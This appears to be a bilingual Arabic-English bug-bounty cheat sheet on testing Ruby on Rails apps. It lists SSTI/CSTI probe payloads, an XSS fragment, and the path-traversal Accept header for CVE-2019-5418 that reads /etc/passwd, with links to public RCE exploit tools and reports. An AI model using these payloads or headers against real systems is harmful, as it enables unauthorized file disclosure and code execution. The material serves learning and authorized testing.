pentesting4arabs
php :https://web.facebook.com/groups/pentesting4arabs/permalink/1147252752397687/
ruby:
من الحاجات الموجوده في rails موضوع ال mass assignment و ممكن يسبب ثغرات كتير https://brakemanscanner.org/docs/warning_types/mass_assignment/
طبعا ممكن تعرفها لو لقيت ال request فيه حاجه زي user[name]=
أي ايند بوينت فيها بيانات مهمة باحولها json عادة بتجيب بيانات اكتر من المعروض في الصفحة العادية
IDORs - business logic vulns - Session Attacks
SSTI RUBY ERB
Queru=fuzz > Query[a]=fuzz > Query[]a=fuzz
try paramiter polution ssti csti ssi arrayi
{{9*9}}
//9*9
$(9*9)
$(1!=0)
$({{9*9}})
%//=9*9
// 81=9*9
<? {{9*9}} ?>
[\\9*9
"\\><{{9*9}}>
<? document.write({{9*9}}); ?>
#//</>♡<script>a//lert(1);<script>
CVE-2019-5418 - File Content Disclosure on Rails
الcve باختصار انت بتغير محتوى request header اللى اسمه accept
وتخليه بالمنظر ده
Accept: ../../../../../../../../../../etc/passwd{{
وبكده هتقدر توصل LFI وتعرض ملف etc/passwd وتقدر تعمل escelate ليها وتوصلها ل RCE وتأكسبلويت بالتول دى
https://github.com/mpgn/Rails-doubletap-RCE
https://hackerone.com/reports/473888
ودول كل الريسورس اللى قدرت اوصلها :
https://github.com/mpgn/CVE-2019-5418
https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q
https://github.com/omarkurt/CVE-2019-5418
Example Report From H1 :
https://hackerone.com/reports/541858
وده لينك التمبلت بتاع cve فى nuclei

Last updated